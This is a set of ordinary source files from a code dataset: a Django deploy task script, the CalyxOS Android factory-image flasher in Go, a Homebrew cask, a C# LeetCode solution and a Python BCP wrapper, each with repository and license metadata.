            "\nINSTALLED_APPS += [{}]".format(
                ", ".join(["'{}'".format(a) for a in app_names])
            )
        )
    # mount each app's urls; rajk_appman is mounted at the site root
    with open(
        "{}/rajkproject/rajkproject/urls.py".format(TEST_DEPLOY_DIRECTORY), "a"
    ) as fp:
        fp.write(
            "\nfrom django.urls import include"
            "\nurlpatterns.append(path('accounts/', include('django.contrib.auth.urls')))"
            "\nurlpatterns += [{}]".format(
                ", ".join(
                    [
                        "path('{}', include('{}.urls'))".format(
                            a + "/" if a != "rajk_appman" else "", a
                        )
                        for a in app_names
                    ]
                )
            )
        )
    # fetch the live data dump and load it into the fresh database
    dump_fname = "{}/dump.json".format(TEST_DEPLOY_DIRECTORY)
    resp = requests.get("https://rajk.uni-corvinus.hu/djangodump.json")
    with open(dump_fname, "wb") as fp:
        fp.write(resp.content)
    for django_command in [
        "makemigrations",
        "makemigrations {}".format(" ".join(app_names)),
        "migrate",
        "loaddata {}".format(dump_fname),
    ]:
        c.run(
            "{}/django_venv/bin/python {}/rajkproject/manage.py {}".format(
                TEST_DEPLOY_DIRECTORY, TEST_DEPLOY_DIRECTORY, django_command
            )
        )
    
@task
def deploy(c, dump_modifier_function=None, live=False, redo_rsa=False):
    """
    Test-deploy the current app into the local environment built by
    setup_test_deploy_env: build an sdist, install it into the test venv,
    reload the live data dump (optionally transformed by
    ``dump_modifier_function``) and re-run migrations. With ``live=True``
    the same tarball is then pushed to production via _live_deploy.
    """
    # capture "python setup.py --fullname" output, e.g. "myapp-1.2.3"
    f = io.StringIO()
    c.run(
        "{}/django_venv/bin/python setup.py --fullname".format(TEST_DEPLOY_DIRECTORY),
        out_stream=f,
    )
    current_app_fullname = f.getvalue().strip()
    f.close()
    c.run("{}/django_venv/bin/python setup.py sdist".format(TEST_DEPLOY_DIRECTORY))
    local_tarball = "./dist/{}.tar.gz".format(current_app_fullname)
    c.run(
        "{}/django_venv/bin/pip install {}".format(TEST_DEPLOY_DIRECTORY, local_tarball)
    )
    # refresh the data dump from the live site
    dump_fname = "{}/dump.json".format(TEST_DEPLOY_DIRECTORY)
    resp = requests.get("https://rajk.uni-corvinus.hu/djangodump.json")
    with open(dump_fname, "wb") as fp:
        fp.write(resp.content)
    if dump_modifier_function is not None:
        use_dump_modifier_function(dump_modifier_function, dump_fname)
    # start from an empty database, then migrate and reload the fixture
    c.run("rm {}/rajkproject/db.sqlite3".format(TEST_DEPLOY_DIRECTORY))
    for django_command in [
        "makemigrations",
        "makemigrations {}".format(current_app_fullname.split("-")[0]),
        "migrate",
        "loaddata {}".format(dump_fname)
    ]:
        c.run(
            "{}/django_venv/bin/python {}/rajkproject/manage.py {}".format(
                TEST_DEPLOY_DIRECTORY, TEST_DEPLOY_DIRECTORY, django_command
            )
        )
    if live:
        _live_deploy(c, local_tarball, current_app_fullname, dump_modifier_function, redo_rsa)
def _live_deploy(c, local_tarball, current_app_fullname, dump_modifier_function=None, redo_rsa=False):
    """
    Push a locally built tarball to the production server: stop the
    service, dump and (optionally) transform its data, install the new
    package, rebuild the database from the dump, and restart.
    """
    if redo_rsa:
        # install the deploy SSH key from the environment first
        if RAJK_RSA:
            redo_rsa_from_text(c, RAJK_RSA)
        else:
            raise EnvironmentError("No RAJK_RSA env variable")
    local_dump_fname = "{}/deploy_dump.json".format(TEST_DEPLOY_DIRECTORY)
    remote_dump_fname = "/var/www/rajkdjango2/deploy_dump.json"
    print("stopping server")
    stop_server(c)
    print("dumping data")
    # dump production data locally (without contenttypes) so the modifier
    # can rewrite it before it is loaded back
    dump(c, local_dump_fname, True)
    if dump_modifier_function is not None:
        use_dump_modifier_function(dump_modifier_function, local_dump_fname)
    scp_command = rajk_server_connection.copy_to_server_command(
        local_dump_fname, remote_dump_fname
    )
    c.run(scp_command)
    # upload the tarball and install it into the production venv
    remote_tarball = "/var/www/rajkdjango2/tarballs/{}".format(
        local_tarball.split("/")[-1]
    )
    tar_scp_command = rajk_server_connection.copy_to_server_command(
        local_tarball, remote_tarball
    )
    c.run(tar_scp_command)
    install_command = "/var/www/rajkdjango2/bin/pip --no-cache-dir install --upgrade {}".format(
        remote_tarball
    )
    remote_install_command = rajk_server_connection.run_ssh_command(install_command)
    c.run(remote_install_command)
    # rebuild the production database from scratch and reload the dump
    c.run(rajk_server_connection.run_ssh_command("rm /var/www/rajkdjango2/db.sqlite3"))
    for django_command in [
        "makemigrations",
        "makemigrations {}".format(current_app_fullname.split("-")[0]),
        "migrate",
        "loaddata {}".format(remote_dump_fname),
    ]:
        c.run(
            rajk_server_connection.remote_python_command(
                "/var/www/rajkdjango2/manage.py {}".format(django_command)
            )
        )
    start_server(c)
|
Python
|
MIT
|
rajk-apps/rajk-appman/rajk_appman/invoke_rajk.py
|
dc826086-585f-4fd9-8cb1-7c456e74e168
|
[{"tag": "USERNAME", "value": "rajk", "start": 345, "end": 349, "context": "\n\nrajk_server_connection = ServerConnection(\n \"rajk\", \"146.110.60.20\", 2222, \"/var/www/rajkdjango2/bi"}, {"tag": "IP_ADDRESS", "value": "146.110.60.20", "start": 353, "end": 366, "context": "erver_connection = ServerConnection(\n \"rajk\", \"146.110.60.20\", 2222, \"/var/www/rajkdjango2/bin/python\"\n)\n\n\ndef"}]
|
[{"tag": "USERNAME", "value": "rajk", "start": 345, "end": 349, "context": "\n\nrajk_server_connection = ServerConnection(\n \"rajk\", \"146.110.60.20\", 2222, \"/var/www/rajkdjango2/bi"}, {"tag": "IP_ADDRESS", "value": "146.110.60.20", "start": 353, "end": 366, "context": "erver_connection = ServerConnection(\n \"rajk\", \"146.110.60.20\", 2222, \"/var/www/rajkdjango2/bin/python\"\n)\n\n\ndef"}]
|
// Copyright 2020 CIS Maxwell, LLC. All rights reserved.
// Copyright 2020 The Calyx Institute
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
package main
import (
"archive/zip"
"crypto/sha256"
"encoding/hex"
"errors"
"fmt"
"io"
"io/ioutil"
"math"
"net/http"
"os"
"os/exec"
"path"
"path/filepath"
"runtime"
"strings"
"sync"
"time"
)
var input string // scratch buffer for the "press ENTER" prompts

var executable, _ = os.Executable()
var cwd = filepath.Dir(executable) // directory the flasher binary runs from

// adb / fastboot command templates, initialized by getPlatformTools().
var adb *exec.Cmd
var fastboot *exec.Cmd

var platformToolsVersion = "30.0.4" // switched to 29.0.6 for jasmine images
var platformToolsZip string
var deviceFactoryFolderMap map[string]string

// Set via LDFLAGS, check Makefile
var version string

const OS = runtime.GOOS

const (
	// udev rules granting the "sudo" group access to Google (18d1) and
	// Xiaomi (2717) USB devices
	UDEV_RULES = "# Google\nSUBSYSTEM==\"usb\", ATTR{idVendor}==\"18d1\", GROUP=\"sudo\"\n# Xiaomi\nSUBSYSTEM==\"usb\", ATTR{idVendor}==\"2717\", GROUP=\"sudo\"\n"
	RULES_FILE = "98-device-flasher.rules"
	RULES_PATH = "/etc/udev/rules.d/"
)

// Semantic aliases for the colored printers below.
var (
	Error = Red
	Warn  = Yellow
)

// ANSI color format wrappers.
var (
	Blue   = Color("\033[1;34m%s\033[0m")
	Red    = Color("\033[1;31m%s\033[0m")
	Yellow = Color("\033[1;33m%s\033[0m")
)
// Color returns a printer that renders its arguments through the given
// ANSI color format string.
func Color(color string) func(...interface{}) string {
	return func(args ...interface{}) string {
		text := fmt.Sprint(args...)
		return fmt.Sprintf(color, text)
	}
}
// errorln appends err to error.log and prints it to stderr in red; when
// fatal it removes the udev rules, waits for ENTER, and exits with 1.
func errorln(err interface{}, fatal bool) {
	log, _ := os.OpenFile("error.log", os.O_APPEND|os.O_CREATE|os.O_WRONLY, 0666)
	_, _ = fmt.Fprintln(log, err)
	_, _ = fmt.Fprintln(os.Stderr, Error(err))
	log.Close()
	if fatal {
		cleanup()
		fmt.Println("Press enter to exit.")
		_, _ = fmt.Scanln(&input)
		os.Exit(1)
	}
}
// warnln prints the warning in the Warn (yellow) color.
func warnln(warning interface{}) {
	fmt.Println(Warn(warning))
}
// cleanup removes the temporary udev rules file installed by
// checkUdevRules (Linux only; no-op elsewhere).
func cleanup() {
	if OS == "linux" {
		_, err := os.Stat(RULES_PATH + RULES_FILE)
		if !os.IsNotExist(err) {
			_ = exec.Command("sudo", "rm", RULES_PATH+RULES_FILE).Run()
		}
	}
}
// main drives the whole flashing flow: locate factory images, fetch
// platform tools, detect devices over adb/fastboot, then flash them.
func main() {
	defer cleanup()
	_ = os.Remove("error.log") // start each run with a fresh error log
	fmt.Println("Android Factory Image Flasher version " + version)
	// Map device codenames to their corresponding extracted factory image folders
	deviceFactoryFolderMap = getFactoryFolders()
	if len(deviceFactoryFolderMap) < 1 {
		errorln(errors.New("Cannot continue without a device factory image. Exiting..."), true)
	}
	err := getPlatformTools()
	if err != nil {
		errorln("Cannot continue without Android platform tools. Exiting...", false)
		errorln(err, true)
	}
	if OS == "linux" {
		// Linux weirdness
		checkUdevRules()
	}
	platformToolCommand := *adb
	platformToolCommand.Args = append(adb.Args, "start-server")
	err = platformToolCommand.Run()
	if err != nil {
		errorln("Cannot start ADB server", false)
		errorln(err, true)
	}
	// Walk the user through the on-device prerequisites before probing.
	warnln("1. Connect to a wifi network and ensure that no SIM cards are installed")
	warnln("2. Enable Developer Options on device (Settings -> About Phone -> tap \"Build number\" 7 times)")
	warnln("3. Enable USB debugging on device (Settings -> System -> Advanced -> Developer Options) and allow the computer to debug (hit \"OK\" on the popup when USB is connected)")
	warnln("4. Enable OEM Unlocking (in the same Developer Options menu)")
	fmt.Println()
	fmt.Print(Warn("Press ENTER to continue"))
	_, _ = fmt.Scanln(&input)
	fmt.Println()
	// Map serial numbers to device codenames by extracting them from adb and fastboot command output
	devices := getDevices()
	if len(devices) == 0 {
		errorln(errors.New("No devices to be flashed. Exiting..."), true)
	} else if !PARALLEL && len(devices) > 1 {
		errorln(errors.New("More than one device detected. Exiting..."), true)
	}
	fmt.Println()
	fmt.Println("Devices to be flashed: ")
	for serialNumber, device := range devices {
		fmt.Println(device + " " + serialNumber)
	}
	fmt.Println()
	fmt.Print(Warn("Press ENTER to continue"))
	_, _ = fmt.Scanln(&input)
	// Sequence: unlock bootloader -> execute flash-all script -> relock bootloader
	flashDevices(devices)
}
// getFactoryFolders scans the working directory for "*factory*.zip"
// archives, extracts each one, and returns a map of device codename
// (the part of the filename before the first '-') to extracted folder.
func getFactoryFolders() map[string]string {
	files, err := ioutil.ReadDir(cwd)
	if err != nil {
		errorln(err, true)
	}
	deviceFactoryFolderMap := map[string]string{}
	for _, file := range files {
		file := file.Name()
		if strings.Contains(file, "factory") && strings.HasSuffix(file, ".zip") {
			// jasmine images require the older 29.0.6 platform tools
			if strings.HasPrefix(file, "jasmine") {
				platformToolsVersion = "29.0.6"
			}
			extracted, err := extractZip(path.Base(file), cwd)
			if err != nil {
				errorln("Cannot continue without a factory image. Exiting...", false)
				errorln(err, true)
			}
			device := strings.Split(file, "-")[0]
			// refuse ambiguous setups: one image per device codename
			if _, exists := deviceFactoryFolderMap[device]; !exists {
				deviceFactoryFolderMap[device] = extracted[0]
			} else {
				errorln("More than one factory image available for "+device, true)
			}
		}
	}
	return deviceFactoryFolderMap
}
// getPlatformTools downloads (if needed) and verifies the platform-tools
// archive for this OS/version, prepends the extracted folder to PATH,
// and initializes the adb/fastboot command templates.
func getPlatformTools() error {
	plaformToolsUrlMap := map[[2]string]string{
		[2]string{"darwin", "29.0.6"}:  "https://dl.google.com/android/repository/platform-tools_r29.0.6-darwin.zip",
		[2]string{"linux", "29.0.6"}:   "https://dl.google.com/android/repository/platform-tools_r29.0.6-linux.zip",
		[2]string{"windows", "29.0.6"}: "https://dl.google.com/android/repository/platform-tools_r29.0.6-windows.zip",
		[2]string{"darwin", "30.0.4"}:  "https://dl.google.com/android/repository/fbad467867e935dce68a0296b00e6d1e76f15b15.platform-tools_r30.0.4-darwin.zip",
		[2]string{"linux", "30.0.4"}:   "https://dl.google.com/android/repository/platform-tools_r30.0.4-linux.zip",
		[2]string{"windows", "30.0.4"}: "https://dl.google.com/android/repository/platform-tools_r30.0.4-windows.zip",
	}
	// Known-good SHA-256 digests for each archive above.
	platformToolsChecksumMap := map[[2]string]string{
		[2]string{"darwin", "29.0.6"}:  "7555e8e24958cae4cfd197135950359b9fe8373d4862a03677f089d215119a3a",
		[2]string{"linux", "29.0.6"}:   "cc9e9d0224d1a917bad71fe12d209dfffe9ce43395e048ab2f07dcfc21101d44",
		[2]string{"windows", "29.0.6"}: "247210e3c12453545f8e1f76e55de3559c03f2d785487b2e4ac00fe9698a039c",
		[2]string{"darwin", "30.0.4"}:  "e0db2bdc784c41847f854d6608e91597ebc3cef66686f647125f5a046068a890",
		[2]string{"linux", "30.0.4"}:   "5be24ed897c7e061ba800bfa7b9ebb4b0f8958cc062f4b2202701e02f2725891",
		[2]string{"windows", "30.0.4"}: "413182fff6c5957911e231b9e97e6be4fc6a539035e3dfb580b5c54bd5950fee",
	}
	platformToolsOsVersion := [2]string{OS, platformToolsVersion}
	// reuse a previously downloaded archive when present
	_, err := os.Stat(path.Base(plaformToolsUrlMap[platformToolsOsVersion]))
	if err != nil {
		err = downloadFile(plaformToolsUrlMap[platformToolsOsVersion])
		if err != nil {
			return err
		}
	}
	platformToolsZip = path.Base(plaformToolsUrlMap[platformToolsOsVersion])
	err = verifyZip(platformToolsZip, platformToolsChecksumMap[platformToolsOsVersion])
	if err != nil {
		fmt.Println(platformToolsZip + " checksum verification failed")
		return err
	}
	platformToolsPath := cwd + string(os.PathSeparator) + "platform-tools" + string(os.PathSeparator)
	// Windows spells the variable "Path"; everything else uses "PATH".
	pathEnvironmentVariable := func() string {
		if OS == "windows" {
			return "Path"
		} else {
			return "PATH"
		}
	}()
	_ = os.Setenv(pathEnvironmentVariable, platformToolsPath+string(os.PathListSeparator)+os.Getenv(pathEnvironmentVariable))
	adbPath := platformToolsPath + "adb"
	fastbootPath := platformToolsPath + "fastboot"
	if OS == "windows" {
		adbPath += ".exe"
		fastbootPath += ".exe"
	}
	adb = exec.Command(adbPath)
	fastboot = exec.Command(fastbootPath)
	// Ensure that no platform tools are running before attempting to overwrite them
	killPlatformTools()
	_, err = extractZip(platformToolsZip, cwd)
	return err
}
// checkUdevRules installs the USB udev rules (via sudo) when they are
// not already present, then reloads udev so they take effect.
func checkUdevRules() {
	_, err := os.Stat(RULES_PATH)
	if os.IsNotExist(err) {
		err = exec.Command("sudo", "mkdir", RULES_PATH).Run()
		if err != nil {
			errorln("Cannot continue without udev rules. Exiting...", false)
			errorln(err, true)
		}
	}
	_, err = os.Stat(RULES_FILE)
	if os.IsNotExist(err) {
		// write the rules file locally, then copy it into place with sudo
		err = ioutil.WriteFile(RULES_FILE, []byte(UDEV_RULES), 0644)
		if err != nil {
			errorln("Cannot continue without udev rules. Exiting...", false)
			errorln(err, true)
		}
		err = exec.Command("sudo", "cp", RULES_FILE, RULES_PATH).Run()
		if err != nil {
			errorln("Cannot continue without udev rules. Exiting...", false)
			errorln(err, true)
		}
		_ = exec.Command("sudo", "udevadm", "control", "--reload-rules").Run()
		_ = exec.Command("sudo", "udevadm", "trigger").Run()
	}
}
// getDevices probes both "adb devices" and "fastboot devices" output and
// returns serial number -> device codename for every attached device
// that has a matching factory image folder.
func getDevices() map[string]string {
	devices := map[string]string{}
	for _, platformToolCommand := range []exec.Cmd{*adb, *fastboot} {
		platformToolCommand.Args = append(platformToolCommand.Args, "devices")
		output, _ := platformToolCommand.Output()
		lines := strings.Split(string(output), "\n")
		if platformToolCommand.Path == adb.Path {
			// adb prints a "List of devices attached" header; skip it
			lines = lines[1:]
		}
		for i, device := range lines {
			if lines[i] != "" && lines[i] != "\r" {
				serialNumber := strings.Split(device, "\t")[0]
				// resolve the codename differently per tool
				if platformToolCommand.Path == adb.Path {
					device = getProp("ro.product.device", serialNumber)
				} else if platformToolCommand.Path == fastboot.Path {
					device = getVar("product", serialNumber)
					if device == "jasmine" {
						device += "_sprout"
					}
				}
				fmt.Print("Detected " + device + " " + serialNumber)
				if _, ok := deviceFactoryFolderMap[device]; ok {
					devices[serialNumber] = device
					fmt.Println()
				} else {
					fmt.Println(". " + "No matching factory image found")
				}
			}
		}
	}
	return devices
}
// getVar reads a fastboot variable ("fastboot getvar <prop>") from the
// given device, returning "" when the command fails or the variable is
// not present in the output.
func getVar(prop string, device string) string {
	platformToolCommand := *fastboot
	platformToolCommand.Args = append(fastboot.Args, "-s", device, "getvar", prop)
	// fastboot prints getvar results on stderr, so capture both streams
	out, err := platformToolCommand.CombinedOutput()
	if err != nil {
		return ""
	}
	lines := strings.Split(string(out), "\n")
	for _, line := range lines {
		if strings.Contains(line, prop) {
			return strings.Trim(strings.Split(line, " ")[1], "\r")
		}
	}
	return ""
}
// getProp reads an Android system property via "adb shell getprop",
// returning "" on failure; brackets and line endings are stripped.
func getProp(prop string, device string) string {
	platformToolCommand := *adb
	platformToolCommand.Args = append(adb.Args, "-s", device, "shell", "getprop", prop)
	out, err := platformToolCommand.Output()
	if err != nil {
		return ""
	}
	return strings.Trim(string(out), "[]\n\r")
}
// flashDevices flashes every detected device concurrently: reboot to
// bootloader, unlock, run the image's flash-all script, relock, reboot.
// Unlock/lock are retried up to 3 times, 30s apart, because the user
// must confirm on the device itself.
func flashDevices(devices map[string]string) {
	var wg sync.WaitGroup
	for serialNumber, device := range devices {
		wg.Add(1)
		go func(serialNumber, device string) {
			defer wg.Done()
			platformToolCommand := *adb
			platformToolCommand.Args = append(platformToolCommand.Args, "-s", serialNumber, "reboot", "bootloader")
			_ = platformToolCommand.Run()
			fmt.Println("Unlocking " + device + " " + serialNumber + " bootloader...")
			warnln("5. Please use the volume and power keys on the device to unlock the bootloader")
			// jasmine/walleye cannot reboot straight into fastboot; the
			// user must re-enter it manually after the unlock reboot
			if device == "jasmine" || device == "walleye" {
				fmt.Println()
				warnln("  5a. Once " + device + " " + serialNumber + " boots, disconnect its cable and power it off")
				warnln("  5b. Then, press volume down + power to boot it into fastboot mode, and connect the cable again.")
				fmt.Println("The installation will resume automatically")
			}
			// poll until the bootloader reports unlocked, retrying the command
			for i := 0; getVar("unlocked", serialNumber) != "yes"; i++ {
				platformToolCommand = *fastboot
				platformToolCommand.Args = append(platformToolCommand.Args, "-s", serialNumber, "flashing", "unlock")
				_ = platformToolCommand.Start()
				time.Sleep(30 * time.Second)
				if i >= 2 {
					errorln("Failed to unlock "+device+" "+serialNumber+" bootloader", false)
					return
				}
			}
			fmt.Println("Flashing " + device + " " + serialNumber + " bootloader...")
			flashAll := exec.Command("." + string(os.PathSeparator) + "flash-all" + func() string {
				if OS == "windows" {
					return ".bat"
				} else {
					return ".sh"
				}
			}())
			// run the script from inside the extracted factory image folder
			flashAll.Dir = deviceFactoryFolderMap[device]
			flashAll.Stderr = os.Stderr
			err := flashAll.Run()
			if err != nil {
				errorln("Failed to flash "+device+" "+serialNumber, false)
				errorln(err.Error(), false)
				return
			}
			fmt.Println("Locking " + device + " " + serialNumber + " bootloader...")
			warnln("6. Please use the volume and power keys on the device to lock the bootloader")
			if device == "jasmine" || device == "walleye" {
				fmt.Println()
				warnln("  6a. Once " + device + " " + serialNumber + " boots, disconnect its cable and power it off")
				warnln("  6b. Then, press volume down + power to boot it into fastboot mode, and connect the cable again.")
				fmt.Println("The installation will resume automatically")
			}
			// same retry loop as unlocking, but waiting for "unlocked: no"
			for i := 0; getVar("unlocked", serialNumber) != "no"; i++ {
				platformToolCommand = *fastboot
				platformToolCommand.Args = append(platformToolCommand.Args, "-s", serialNumber, "flashing", "lock")
				_ = platformToolCommand.Start()
				time.Sleep(30 * time.Second)
				if i >= 2 {
					errorln("Failed to lock "+device+" "+serialNumber+" bootloader", false)
					return
				}
			}
			fmt.Println("Rebooting " + device + " " + serialNumber + "...")
			platformToolCommand = *fastboot
			platformToolCommand.Args = append(platformToolCommand.Args, "-s", serialNumber, "reboot")
			_ = platformToolCommand.Start()
			warnln("7. Disable OEM unlocking from Developer Options after setting up your device")
		}(serialNumber, device)
	}
	wg.Wait()
	fmt.Println()
	fmt.Println(Blue("Flashing complete"))
}
// killPlatformTools stops any running adb server (and, on Windows, any
// fastboot.exe) so the tool binaries can be safely overwritten.
func killPlatformTools() {
	_, err := os.Stat(adb.Path)
	if err == nil {
		platformToolCommand := *adb
		platformToolCommand.Args = append(platformToolCommand.Args, "kill-server")
		_ = platformToolCommand.Run()
	}
	if OS == "windows" {
		_ = exec.Command("taskkill", "/IM", "fastboot.exe", "/F").Run()
	}
}
// downloadFile fetches url into the current directory (named after the
// URL's last path segment), printing download progress as it goes.
func downloadFile(url string) error {
	fmt.Println("Downloading " + url)
	resp, err := http.Get(url)
	if err != nil {
		return err
	}
	defer resp.Body.Close()

	out, err := os.Create(path.Base(url))
	if err != nil {
		return err
	}
	defer out.Close()

	// TeeReader feeds every chunk through the progress counter
	counter := &WriteCounter{}
	_, err = io.Copy(out, io.TeeReader(resp.Body, counter))
	fmt.Println()
	return err
}
// extractZip unpacks src into destination and returns the list of paths
// written. Entries that would escape destination ("zip slip") are
// rejected with an error.
func extractZip(src string, destination string) ([]string, error) {
	fmt.Println("Extracting " + src)
	var filenames []string
	r, err := zip.OpenReader(src)
	if err != nil {
		return filenames, err
	}
	defer r.Close()
	for _, f := range r.File {
		fpath := filepath.Join(destination, f.Name)
		// zip-slip guard: the joined path must stay inside destination
		if !strings.HasPrefix(fpath, filepath.Clean(destination)+string(os.PathSeparator)) {
			return filenames, fmt.Errorf("%s is an illegal filepath", fpath)
		}
		filenames = append(filenames, fpath)
		if f.FileInfo().IsDir() {
			os.MkdirAll(fpath, os.ModePerm)
			continue
		}
		if err = os.MkdirAll(filepath.Dir(fpath), os.ModePerm); err != nil {
			return filenames, err
		}
		// preserve the archived file's permission bits
		outFile, err := os.OpenFile(fpath,
			os.O_WRONLY|os.O_CREATE|os.O_TRUNC,
			f.Mode())
		if err != nil {
			return filenames, err
		}
		rc, err := f.Open()
		if err != nil {
			return filenames, err
		}
		_, err = io.Copy(outFile, rc)
		outFile.Close()
		rc.Close()
		if err != nil {
			return filenames, err
		}
	}
	return filenames, nil
}
func verifyZip(zipfile, sha256sum string) error {
fmt.Println("Verifying " + zipfile)
f, err := os.Open(zipfile)
if err != nil {
return err
}
defer f.Close()
h := sha256.New()
if _, err := io.Copy(h, f); err != nil {
return err
}
sum := hex.EncodeToString(h.Sum(nil))
if sha256sum == sum {
return nil
}
return errors.New("sha256sum mismatch")
}
// WriteCounter counts bytes written through it and reports download
// progress; used as the TeeReader sink in downloadFile.
type WriteCounter struct {
	Total uint64 // total bytes seen so far
}

// Write implements io.Writer: it never stores p, only counts it.
func (wc *WriteCounter) Write(p []byte) (int, error) {
	n := len(p)
	wc.Total += uint64(n)
	wc.PrintProgress()
	return n, nil
}

// PrintProgress rewrites the current line with the running byte count.
func (wc WriteCounter) PrintProgress() {
	fmt.Printf("\r%s", strings.Repeat(" ", 35))
	fmt.Printf("\rDownloading... %s downloaded", Bytes(wc.Total))
}
// logn returns the base-b logarithm of n.
func logn(n, b float64) float64 {
	return math.Log(n) / math.Log(b)
}
// humanateBytes renders s with the given base and unit suffixes,
// e.g. humanateBytes(82854982, 1000, sizes) -> "82.9 MB".
func humanateBytes(s uint64, base float64, sizes []string) string {
	// below 10 bytes there is nothing to scale
	if s < 10 {
		return fmt.Sprintf("%d B", s)
	}
	e := math.Floor(logn(float64(s), base))
	suffix := sizes[int(e)]
	// round to one decimal place
	val := math.Floor(float64(s)/math.Pow(base, e)*10+0.5) / 10
	// show the decimal only for values under 10
	f := "%.0f %s"
	if val < 10 {
		f = "%.1f %s"
	}
	return fmt.Sprintf(f, val, suffix)
}
// Bytes renders s as a human-readable SI (base-1000) size string.
func Bytes(s uint64) string {
	suffixes := []string{"B", "kB", "MB", "GB", "TB", "PB", "EB"}
	return humanateBytes(s, 1000, suffixes)
}
|
GO
|
Apache-2.0
|
CalyxOS/device-flasher/flasher.go
|
55cb8496-7280-4804-8b60-23fbabbee427
|
[]
|
[]
|
cask 'qownnotes' do
  # version is "app version,build id" — the two halves are interpolated
  # separately into the download URL below
  version '19.6.3,b4310-141410'
  sha256 'f193f7bcbcd6b36ecae4a88da3f15d523bc243649eff3471ff40814c9a0bfb67'

  # github.com/pbek/QOwnNotes was verified as official when first introduced to the cask
  url "https://github.com/pbek/QOwnNotes/releases/download/macosx-#{version.after_comma}/QOwnNotes-#{version.before_comma}.dmg"
  appcast 'https://www.qownnotes.org/api/v1/last_release/QOwnNotes/macosx.json'
  name 'QOwnNotes'
  homepage 'https://www.qownnotes.org/'

  auto_updates true
  depends_on macos: '>= :sierra'

  app 'QOwnNotes.app'
end
|
Ruby
|
BSD-2-Clause
|
mcdado/homebrew-cask/Casks/qownnotes.rb
|
a82458a3-63c0-4355-bc17-d339d1665c99
|
[{"tag": "USERNAME", "value": "pbek", "start": 144, "end": 148, "context": "3bc243649eff3471ff40814c9a0bfb67'\n\n # github.com/pbek/QOwnNotes was verified as official when first int"}, {"tag": "USERNAME", "value": "pbek", "start": 244, "end": 248, "context": " introduced to the cask\n url \"https://github.com/pbek/QOwnNotes/releases/download/macosx-#{version.afte"}]
|
[{"tag": "USERNAME", "value": "pbek", "start": 144, "end": 148, "context": "3bc243649eff3471ff40814c9a0bfb67'\n\n # github.com/pbek/QOwnNotes was verified as official when first int"}, {"tag": "USERNAME", "value": "pbek", "start": 244, "end": 248, "context": " introduced to the cask\n url \"https://github.com/pbek/QOwnNotes/releases/download/macosx-#{version.afte"}]
|
using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
namespace LeetCode.Challenge
{
/// <summary>
/// https://leetcode.com/explore/challenge/card/november-leetcoding-challenge/566/week-3-november-15th-november-21st/3534/
///
/// </summary>
internal class Nov17
{
public class Solution
{
public int MirrorReflection(int p, int q)
{
if (q == 0)
return 0;
var qpos = 0;
for (var i = 0; ; i++)
{
qpos += q;
if (qpos % p == 0)
{
if (i % 2 == 1)
return 2;
else
{
var div = qpos / p;
if (div % 2 == 0)
return 0;
return 1;
}
}
}
return -1;
}
}
}
}
|
C#
|
MIT
|
viacheslave/algo/leetcode-challenge/c#/Problems/2020/11/Nov17.cs
|
a4336b04-786e-4c5f-b876-a37306e01a6c
|
[]
|
[]
|
# -*- coding: utf-8 -*-
"""
Created on Sat Aug 3 23:07:15 2019
@author: ydima
"""
import logging
import os
from pathlib import Path
import random
import shlex
import string
from subprocess import PIPE, Popen
import tempfile
from typing import Dict, List, Optional, Union
import pandas as pd
from .constants import (
DIRECTIONS,
IN,
IS_WIN32,
NEWLINE,
OUT,
QUERY,
QUERYOUT,
SQLCHAR,
TABLE,
VIEW,
BCPandasException,
BCPandasValueError,
read_data_settings,
sql_collation,
)
logger = logging.getLogger(__name__)
def bcp(
    sql_item: str,
    direction: str,
    flat_file: str,
    creds,
    sql_type: str = "table",
    schema: str = "dbo",
    format_file_path: str = None,
    batch_size: int = None,
    col_delimiter: str = None,
    row_terminator: str = None,
    bcp_path: Union[str, Path] = None,
    error_file_path: str = None
):
    """
    Build and run a BCP command moving data between `flat_file` and the
    SQL object named by `sql_item`.

    See https://docs.microsoft.com/en-us/sql/tools/bcp-utility

    Raises
    ------
    BCPandasValueError
        For an invalid direction or direction/object combination.
    BCPandasException
        When the bcp process exits with a non-zero code.
    """
    combos = {TABLE: [IN, OUT], QUERY: [QUERYOUT], VIEW: [IN, OUT]}
    direc = direction.lower()
    # validation
    if direc not in DIRECTIONS:
        raise BCPandasValueError(
            f"Param 'direction' must be one of {DIRECTIONS}, you passed {direc}"
        )
    if direc not in combos[sql_type]:
        raise BCPandasValueError(
            f"Wrong combo of direction and SQL object, you passed {sql_type} and {direc} ."
        )
    # auth: Kerberos trusted connection vs explicit credentials
    if creds.with_krb_auth:
        auth = ["-T"]
    else:
        auth = ["-U", creds.username, "-P", creds.password]
    # prepare SQL item string
    if sql_type == QUERY:
        # remove newlines for queries, otherwise messes up BCP
        sql_item_string = quote_this("".join(sql_item.splitlines()))
    else:
        sql_item_string = f"{schema}.{sql_item}"
    # construct BCP command
    bcp_command = [
        "bcp" if bcp_path is None else quote_this(str(bcp_path)),
        sql_item_string,
        direc,
        flat_file,
        "-S",
        creds.server,
        "-d",
        creds.database,
        "-q",  # Executes the SET QUOTED_IDENTIFIERS ON statement, needed for Azure SQL DW
    ] + auth
    # Bug fix: "-e"/error_file_path used to be appended unconditionally, so
    # a None placeholder ended up in the command whenever no error file was
    # requested, breaking the subprocess invocation. Append only when set.
    if error_file_path:
        bcp_command += ["-e", error_file_path]
    if batch_size:
        bcp_command += ["-b", str(batch_size)]
    # formats
    if direc == IN:
        bcp_command += ["-f", format_file_path]
    elif direc in (OUT, QUERYOUT):
        bcp_command += [
            "-c",  # marking as character data, not Unicode (maybe make as param?)
            quote_this(
                f"-t{read_data_settings['delimiter'] if col_delimiter is None else col_delimiter}"
            ),
            quote_this(
                f"-r{read_data_settings['newline'] if row_terminator is None else row_terminator}"
            ),
        ]
    # execute, redacting the password from the logged command
    bcp_command_log = [c if c != creds.password else "[REDACTED]" for c in bcp_command]
    logger.info(f"Executing BCP command now... \nBCP command is: {bcp_command_log}")
    ret_code = run_cmd(bcp_command)
    if ret_code:
        raise BCPandasException(f"Bcp command failed with exit code {ret_code}")
def get_temp_file() -> str:
    """
    Build (but do not create) a path for a uniquely named temporary file.

    Returns
    -------
    Full path inside the system temp directory whose basename is a random
    21-character alphanumeric string.
    """
